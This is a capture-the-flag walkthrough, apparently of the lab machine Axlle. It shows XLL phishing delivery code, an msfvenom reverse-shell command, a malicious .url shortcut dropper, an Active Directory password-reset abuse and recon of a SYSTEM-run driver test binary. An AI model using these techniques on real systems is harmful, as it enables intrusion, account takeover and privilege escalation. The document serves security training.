This is a Windows Server 2022 machine that hosts a web site under development. The developers have opened an email account where users can send their suggestions in Excel format. We leverage this to send a malicious XLL phishing email, which gives us a first shell on the system. To get the user flag we move laterally to another user by means of a second client-side attack: placing a malicious .url shortcut in a folder used by the web developers team and waiting for someone to open it. For escalation, we first move laterally to another domain user by abusing a ForceChangePassword permission (the User-Force-Change-Password extended right) granted in Active Directory. The final step to administrator is made by abusing the Windows Driver Kit test binary standalonerunner.exe, which the developers run as SYSTEM on the box.
> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-09 10:34 EDT
Nmap scan report for 10.10.11.21
Host is up, received user-set (0.042s latency).
Not shown: 65513 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
25/tcp open smtp syn-ack
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
49664/tcp open unknown syn-ack
59781/tcp open unknown syn-ack
59782/tcp open unknown syn-ack
59783/tcp open unknown syn-ack
59789/tcp open unknown syn-ack
59796/tcp open unknown syn-ack
59805/tcp open unknown syn-ack
Nmap done: 1 IP address (1 host up) scanned in 26.46 seconds
Enumerate the open ports.
> nmap $target -p25,53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sV -sC -Pn -vv
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-09 10:46 EDT
Nmap scan report for 10.10.11.21
Host is up, received user-set (0.040s latency).
Scanned at 2024-10-09 10:46:47 EDT for 56s
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack hMailServer smtpd
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: FAF2C069F86E802FD21BF15DC8EDD2DC
|_http-title: Axlle Development
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-10-09 14:47:18Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack .NET Message Framing
Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 29964/tcp): CLEAN (Timeout)
| Check 2 (port 22598/tcp): CLEAN (Timeout)
| Check 3 (port 59572/udp): CLEAN (Timeout)
| Check 4 (port 32412/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 25s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-10-09T14:47:29
|_ start_date: N/A
Nmap done: 1 IP address (1 host up) scanned in 56.75 seconds
This looks like a domain controller: Kerberos, LDAP, the global catalog and ADWS are all exposed, and LDAP reports the domain axlle.htb on host MAINFRAME. Add axlle.htb and mainframe.axlle.htb to /etc/hosts and enumerate the web site with Firefox.
The site provides an email address to which users can send suggestions in Excel format, but warns that macros are disabled, so we need a way to deliver a payload in an Excel file without using macros.
The answer is an XLL add-in: a native DLL that Excel loads directly and whose exported xlAutoOpen function runs as soon as the file is opened, so macro security never comes into play (the victim only sees Excel's "enable this add-in" prompt). Note that current Office builds block XLL files that carry the Mark-of-the-Web, so this relies on the victim opening the attachment without that mark. The technique is explained in the following links.
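As an added example that is not part of the original write-up, the delivery step in PowerShell: it first reads the PE header of the XLL to confirm its bitness, because Excel silently refuses an add-in built for the other architecture, and then mails it to the suggestions mailbox. The file name suggestions.xll, the mailbox address webdevs@axlle.htb, the sender address and the assumption that hMailServer accepts unauthenticated mail for its own domain on port 25 are all assumptions; the handler (nc -lvnp 1919) must be listening before the mail goes out.

```powershell
# Added example, not code from the original write-up.
# Assumptions: suggestions.xll was built separately; webdevs@axlle.htb is the
# suggestions mailbox; hMailServer delivers unauthenticated mail to its own domain.
param(
    [string]$Xll  = '.\suggestions.xll',
    [string]$To   = 'webdevs@axlle.htb',    # assumed target mailbox
    [string]$From = 'jane.doe@axlle.htb',   # assumed, any plausible sender
    [string]$Smtp = 'mainframe.axlle.htb',  # needs a hosts entry
    [int]   $Port = 25
)

# Read the COFF Machine field of a PE file: 0x8664 = x64, 0x014C = x86.
function Get-PeMachine {
    param([string]$Path)
    $b = [System.IO.File]::ReadAllBytes((Resolve-Path $Path).Path)
    if ($b[0] -ne 0x4D -or $b[1] -ne 0x5A) { throw "$Path is not a PE file (no MZ header)" }
    $pe = [BitConverter]::ToInt32($b, 0x3C)                      # e_lfanew
    if ([BitConverter]::ToUInt32($b, $pe) -ne 0x00004550) { throw "$Path has no PE signature" }
    switch ([BitConverter]::ToUInt16($b, $pe + 4)) {
        0x8664  { 'x64' }
        0x014C  { 'x86' }
        default { 'unknown' }
    }
}

$arch = Get-PeMachine $Xll
Write-Host "[*] $Xll is a $arch DLL; it must match the bitness of the victim's Excel (x64 is the usual first try on an x64 host)"

# Keep the .xll extension: Excel only treats a file as an add-in by that extension.
$body = @"
Hi,

Attached are my suggestions for the new site, in the spreadsheet format you asked for.
"@
Send-MailMessage -SmtpServer $Smtp -Port $Port -From $From -To $To `
    -Subject 'Site suggestions' -Body $body -Attachments $Xll -WarningAction SilentlyContinue
Write-Host "[*] Sent; wait for the callback on the port 1919 listener"
```

Send-MailMessage is marked obsolete in PowerShell 7 but still works against a plain SMTP server like this one. If the server answers with a relay or authentication error, the AUTH LOGIN the nmap banner advertised is the next thing to try, with credentials you do not yet have at this point, so the unauthenticated path is worth confirming first.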
A reverse shell for user axlle\gideon.hamill is received on port 1919 once the attachment is opened.
Use this shell to enumerate the file system. hMailServer stores each mailbox's messages under Data\<domain>\<account>, and in C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F we find a stored email as an .eml file. Note that the first cd below has no effect because the path contains spaces and is not quoted, so dir still lists C:\.
> cd C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F
> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/1/2024 10:03 PM App Development
d----- 1/1/2024 6:33 AM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 6/13/2024 2:20 AM Program Files
d----- 6/13/2024 2:23 AM Program Files (x86)
d-r--- 1/1/2024 4:15 AM Users
d----- 6/13/2024 4:30 AM Windows
> cd "C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F"
> dir
Directory: C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/1/2024 6:32 AM 997 {2F7523BD-628F-4359-913E-A873FCC59D0F}.eml
Let's browse its contents.
> type *
Return-Path: webdevs@axlle.htb
Received: from bumbag (Unknown [192.168.77.153])
by MAINFRAME with ESMTP
; Mon, 1 Jan 2024 06:32:24 -0800
Date: Tue, 02 Jan 2024 01:32:23 +1100
To: dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb
From: webdevs@axlle.htb
Subject: OSINT Application Testing
Message-Id: <20240102013223.019081@bumbag>
X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
Hi everyone,
The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.
We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.
Yours in click-worthy URLs,
The Web Dev Team
So the Web Dev group expects .url web shortcut files to be dropped into C:\inetpub\testing and will open them there, either by hand or through the automation they mention. As a bonus, the recipient list gives us the user names of the whole team.
Let's create an EXE payload with msfvenom and transfer it to C:\inetpub\testing
> msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.91 lport=9000 -f exe -a x64 --platform windows -o shell.exe
Now start a listener on port 9000 and create a malicious .url shortcut pointing to this payload, so that a reverse shell comes back every time someone from the Web Dev team opens it. We drop the shortcut into the same folder.
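The shortcut itself, as an added example that is not part of the original write-up, written in PowerShell from the gideon.hamill shell. It assumes shell.exe (from the msfvenom command above) has already been uploaded to C:\Users\Public and that the port 9000 listener is running; the name suggestion.url is arbitrary.

```powershell
# Added example, not code from the original write-up.
# Assumes shell.exe is already at C:\Users\Public\shell.exe and nc -lvnp 9000 is listening.
$testing = 'C:\inetpub\testing'
$exe     = Join-Path $testing 'shell.exe'

function New-UrlShortcut {
    param([string]$Path, [string]$Target)
    # A .url file is a small INI file. The URL may be a file:/// URL; when the
    # shortcut is opened, the shell hands the target to its default handler, and
    # for an .exe that handler simply runs it.
    $url   = 'file:///' + ($Target -replace '\\', '/')
    $lines = @('[InternetShortcut]', "URL=$url")
    # ASCII with CRLF line endings and no BOM, the form Windows itself writes.
    [System.IO.File]::WriteAllText($Path, ($lines -join "`r`n") + "`r`n", [System.Text.Encoding]::ASCII)
}

Copy-Item 'C:\Users\Public\shell.exe' -Destination $exe
New-UrlShortcut -Path (Join-Path $testing 'suggestion.url') -Target $exe

# Sanity check: both files are in place and the shortcut reads as expected.
Get-ChildItem $testing
Get-Content (Join-Path $testing 'suggestion.url')
```

The shell arrives as whoever opens the shortcut, so the account you land on depends on the victim (here dallon.matrix). Every open spawns a fresh shell.exe, so keep the listener up and be ready to catch more than one connection.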
Shortly after, a reverse shell for another Web Dev user axlle\dallon.matrix is received on port 9000.
Use it to retrieve the user flag.
SYSTEM
Start from the low-priv shell and take the opportunity to enumerate the system and the current user.
> systeminfo
Host Name: MAINFRAME
OS Name: Microsoft Windows Server 2022 Standard
OS Version: 10.0.20348 N/A Build 20348
System Type: x64-based PC
> net user dallon.matrix
User name dallon.matrix
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/13/2024 1:04:25 AM
Password expires Never
Password changeable 6/14/2024 1:04:25 AM
Password required Yes
User may change password Yes
Workstations allowed MAINFRAME
Logon script
User profile
Home directory
Last logon 10/9/2024 9:42:37 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Web Devs *Domain Users
The command completed successfully.
> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Nothing usable so far. Let's enumerate the domain with BloodHound.
First transfer the SharpHound collector and gather the data.
> sharphound.exe --collectionmethods all
2024-10-09T09:57:04.0025209-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2024-10-09T09:57:04.1744044-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-10-09T09:57:04.2056804-07:00|INFORMATION|Initializing SharpHound at 9:57 AM on 10/9/2024
2024-10-09T09:57:04.3931446-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-10-09T09:57:04.5650426-07:00|INFORMATION|Beginning LDAP search for axlle.htb
2024-10-09T09:57:04.6118979-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-10-09T09:57:04.6118979-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-10-09T09:57:35.2838139-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-10-09T09:57:48.5650122-07:00|INFORMATION|Consumers finished, closing output channel
2024-10-09T09:57:48.5962640-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-10-09T09:57:48.7681444-07:00|INFORMATION|Status: 113 objects finished (+113 2.568182)/s -- Using 44 MB RAM
2024-10-09T09:57:48.7681444-07:00|INFORMATION|Enumeration finished in 00:00:44.2115548
2024-10-09T09:57:48.8618925-07:00|INFORMATION|Saving cache with stats: 72 ID to type mappings.
72 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-10-09T09:57:48.8618925-07:00|INFORMATION|SharpHound Enumeration Completed at 9:57 AM on 10/9/2024! Happy Graphing!
Transfer the resulting .zip file to Kali and ingest the data into BloodHound. The current user is a member of the Web Devs group (see the net user output above), and that group holds ForceChangePassword over the user jacob.greeny: the User-Force-Change-Password extended right, which lets us reset that account's password without knowing the current one.
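As an added example that is not part of the original write-up, here is how to confirm the edge from dallon.matrix's shell before trusting it, and then perform the reset. It assumes the ActiveDirectory PowerShell module is available, which it is on a domain controller; the GUID is the well-known identifier of the User-Force-Change-Password right.

```powershell
# Added example, not code from the original write-up. Run from dallon.matrix's shell.
# Assumes the ActiveDirectory module is available (it is on a domain controller).
Import-Module ActiveDirectory

$target = Get-ADUser -Identity jacob.greeny
$acl    = Get-Acl -Path "AD:\$($target.DistinguishedName)"

# The User-Force-Change-Password extended right has this well-known GUID; an ACE
# granting ExtendedRight with an empty ObjectType, or GenericAll, covers it too.
$forceChangePassword = [guid]'00299570-246d-11d0-a768-00aa006e0529'
$acl.Access |
    Where-Object {
        $_.AccessControlType -eq 'Allow' -and (
            $_.ActiveDirectoryRights -match 'GenericAll' -or
            ($_.ActiveDirectoryRights -match 'ExtendedRight' -and
             ($_.ObjectType -eq $forceChangePassword -or $_.ObjectType -eq [guid]::Empty)))
    } |
    Select-Object IdentityReference, ActiveDirectoryRights, ObjectType
# Expect the Web Devs group, one of our own groups, among the identities listed.

# Reset, not change: no current password is needed. This is destructive for the
# account owner, so record it for the report, and respect the domain password policy.
$newPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-ADAccountPassword -Identity jacob.greeny -Reset -NewPassword $newPassword
# Without the AD module the same reset is: net user jacob.greeny 'Password123!' /domain
```

Whichever command you use, the reset succeeds only through the ACE shown above, so an empty result from the ACL query means the BloodHound edge is wrong or stale and the reset will be denied.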
Then move laterally to jacob.greeny with the newly set password over WinRM (port 5985 is open) using evil-winrm.
> evil-winrm -u jacob.greeny -p 'Password123!' -i axlle.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents>
Now we can move to the C:\App Development\kbfiltr folder and inspect the README.md file.
> type README.md
# Keyboard Translation Program
This is an application in development that uses a WDF kbfiltr as the basis for a translation program. The aim of this application is to allow users to program and simulate custom keyboard layouts for real or fictional languages.
## Features
- Create custom keyboard layouts for real or fictional languages.
- Simulate keyboard inputs using the custom layouts.
- Secret codes to switch between languages and logging output.
## Progress
- kbfiltr driver - Complete
- Keyboard mapping - Complete (hardcoded in driver)
- Custom mapping in application layer - In progress
- Logging - Complete
- Activation of logging - Complete
- Simulation of other keyboard layouts - Incomplete
- Activation of other keyboard layouts - Incomplete
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
## Prerequisites
- Windows 10 or higher
- Visual Studio 2019
- Windows Driver Kit (WDK) 10
## Getting Started
- Clone this repository.
- Open the solution file in Visual Studio.
- Build the solution in Release mode.
- Install the driver by running `.\devcon.exe install .\kbfiltr.inf "*PNP0303"` as Administrator.
- Install the driver as an upperclass filter with `.\devcon.exe /r classfilter keyboard upper -keylogger` as Administrator.
- Install the application by running the install_app.bat file as Administrator.
- Reboot your computer to load the driver.
- Launch the application and start programming your custom keyboard layouts.
## Usage
### Programming a Custom Layout
- Launch the application.
- Click on the Program Layout button.
- Select the language for which you want to program the layout.
- Select the key you want to modify from the list.
- Modify the key's scancode and virtual key code as required.
- Repeat steps 4 and 5 for all the keys you want to modify.
- Save the layout by clicking on the Save Layout button.
### Simulating Inputs
- Launch the application.
- Click on the Simulate Input button.
- Select the language for which you want to simulate the input.
- Type in the input in the normal English layout.
- Trigger language switch as outlined below (when required).
- Verify that the input is translated to the selected language.
### Logging Output
- Launch the application.
- Turn on logging (shortcuts can be created as explained below)
- Use the application as normal.
- The log file will be created in the same directory as the application.
## Triggering/Activation
- To toggle logging output, set up a shortcut in the options menu. INCOMPLETE
- To switch to a different language, press the Left Alt key and the Right Ctrl key simultaneously. INCOMPLETE
## Bugs
There are probably several.
The author says:
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
This standalonerunner.exe binary is a tool for testing and debugging drivers on Windows systems.
Searching the Internet, we find an article by a researcher that explains how to get command execution by abusing this binary.
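Before following the article, it pays to establish two things from the jacob.greeny shell: how exactly standalonerunner.exe is launched as SYSTEM, and what our user can write in its directory, since any file-based abuse of a SYSTEM-run binary depends on that. The following checks are an added example, not part of the original write-up; they make no assumption about how the binary is abused.

```powershell
# Added example, not code from the original write-up: reconnaissance around the
# binary the README says is run as SYSTEM.
$runner = 'C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe'
$dir    = Split-Path $runner

if (-not (Test-Path $runner)) { throw "$runner is not present" }

# Scheduled tasks are the usual way to "automate ... as SYSTEM". A low-privileged
# user is not allowed to read every task, so an empty result is not conclusive.
Get-ScheduledTask | ForEach-Object {
    $task = $_
    $task.Actions | Where-Object { $_.Execute -like '*standalonerunner*' } | ForEach-Object {
        [pscustomobject]@{
            Task  = $task.TaskName
            RunAs = $task.Principal.UserId
            Exec  = $_.Execute
            Args  = $_.Arguments
        }
    }
}

# Is it running right now, and under which account (needs a process listing with owners)?
tasklist /v /fi 'imagename eq standalonerunner.exe'

# What can we, and the groups we belong to, do in the binary's directory?
icacls $dir

# Definitive answer: try to create and remove a file there.
$probe = Join-Path $dir 'probe.txt'
try {
    Set-Content -Path $probe -Value 'x' -ErrorAction Stop
    Remove-Item $probe
    "$dir is writable by $(whoami)"
} catch {
    "$dir is not writable by $(whoami)"
}
```

If the directory is not writable, look at the ACLs of its subdirectories as well; a SYSTEM task whose working files live somewhere a low-privileged user can write is the condition any abuse of this kind needs, and confirming it first avoids blindly following a recipe that does not apply to this host.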